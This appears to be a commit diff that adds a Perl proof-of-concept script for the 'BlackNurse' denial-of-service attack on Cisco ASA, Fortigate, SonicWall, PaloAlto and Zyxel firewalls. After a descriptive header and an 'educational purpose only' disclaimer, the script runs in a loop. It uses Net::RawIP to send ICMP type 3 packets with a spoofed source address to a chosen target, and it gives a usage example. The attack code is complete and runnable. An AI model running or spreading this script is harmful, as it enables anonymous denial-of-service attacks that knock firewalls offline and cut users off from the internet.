|
| 1 | +#!/usr/bin/perl |
| 2 | +# |
| 3 | +# Cisco ASA 5515/5525/5550/5515-X | Fotinet | |
| 4 | +# Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | |
| 5 | +# Zyxel Zywall USG50 Spoofed "BlackNurse" DoS PoC |
| 6 | +# |
| 7 | +# Copyright 2016 (c) Todor Donev |
| 8 | +# Varna, Bulgaria |
| 9 | + |
| 10 | +# https://www.ethical-hacker.org/ |
| 11 | +# https://www.facebook.com/ethicalhackerorg |
| 12 | +# http://pastebin.com/u/hackerscommunity |
| 13 | +# |
| 14 | +# |
| 15 | +# Description: |
| 16 | +# Blacknurse is a low bandwidth ICMP attack that is capable of doing denial |
| 17 | +# of service to well known firewalls. Most ICMP attacks that we see are based |
| 18 | +# on ICMP Type 8 Code 0 also called a ping flood attack. BlackNurse is based |
| 19 | +# on ICMP with Type 3 Code 3 packets. We know that when a user has allowed ICMP |
| 20 | +# Type 3 Code 3 to outside interfaces, the BlackNurse attack becomes highly |
| 21 | +# effective even at low bandwidth. Low bandwidth is in this case around 15-18 |
| 22 | +# Mbit/s. This is to achieve the volume of packets needed which is around 40 to |
| 23 | +# 50K packets per second. It does not matter if you have a 1 Gbit/s Internet |
| 24 | +# connection. The impact we see on different firewalls is typically high CPU |
| 25 | +# loads. When an attack is ongoing, users from the LAN side will no longer be |
| 26 | +# able to send/receive traffic to/from the Internet. All firewalls we have seen |
| 27 | +# recover when the attack stops. |
| 28 | +# |
| 29 | +# Disclaimer: |
| 30 | +# This or previous program is for Educational purpose ONLY. Do not |
| 31 | +# use it without permission. The usual disclaimer applies, especially |
| 32 | +# the fact that Todor Donev is not liable for any damages caused by |
| 33 | +# direct or indirect use of the information or functionality provided |
| 34 | +# by these programs. The author or any Internet provider bears NO |
| 35 | +# responsibility for content or misuse of these programs or any |
| 36 | +# derivatives thereof. By using these programs you accept the fact |
| 37 | +# that any damage (dataloss, system crash, system compromise, etc.) |
| 38 | +# caused by the use of these programs is not Todor Donev's |
| 39 | +# responsibility. |
| 40 | +# |
| 41 | +# Use at your own risk and educational |
| 42 | +# purpose ONLY! |
| 43 | +# |
| 44 | +# Thanks to Maya (Maiya|Mia) Hristova and all my friends |
| 45 | +# that support me. |
| 46 | +# |
| 47 | +# |
| 48 | + |
| 49 | +use Net::RawIP; |
| 50 | + |
| 51 | +print "[ Cisco ASA 5515/5525/5550/5515-X | Fotinet | Fortigate | SonicWall | PaloAlto | Zyxel NWA3560-N | Zyxel Zywall USG50 Spoofed \"BlackNurse\" DoS PoC\n"; |
| 52 | +print "[ ======\n"; |
| 53 | +print "[ Usg: $0 <spoofed address> <target>\n"; |
| 54 | +print "[ Example: perl $0 133.71.33.7 192.168.1.1\n"; |
| 55 | +print "[ ======\n"; |
| 56 | +print "[ <todor.donev\@gmail.com> Todor Donev\n"; |
| 57 | +print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n"; |
| 58 | +print "[ Website: https://www.ethical-hacker.org/\n"; |
| 59 | + |
| 60 | +my $spoof = $ARGV[0]; |
| 61 | +my $target = $ARGV[1]; |
| 62 | + |
| 63 | +my $sock = new Net::RawIP({ icmp => {} }) or die; |
| 64 | + |
| 65 | +print "[ Sending crafted packets..\n"; |
| 66 | +while () { |
| 67 | + $sock->set({ ip => { saddr => $spoof, daddr => $target}, |
| 68 | + icmp => { type => 3, code => 3} }); |
| 69 | + $sock->send; |
| 70 | + $sock->set({ icmp => { type=>3, code => 0}}); |
| 71 | + $sock->send; |
| 72 | + $sock->set({ icmp => { type=>3, code => 1}}); |
| 73 | + $sock->send; |
| 74 | + $sock->set({ icmp => { type=>3, code => 2}}); |
| 75 | + $sock->send; |
| 76 | +} |
0 commit comments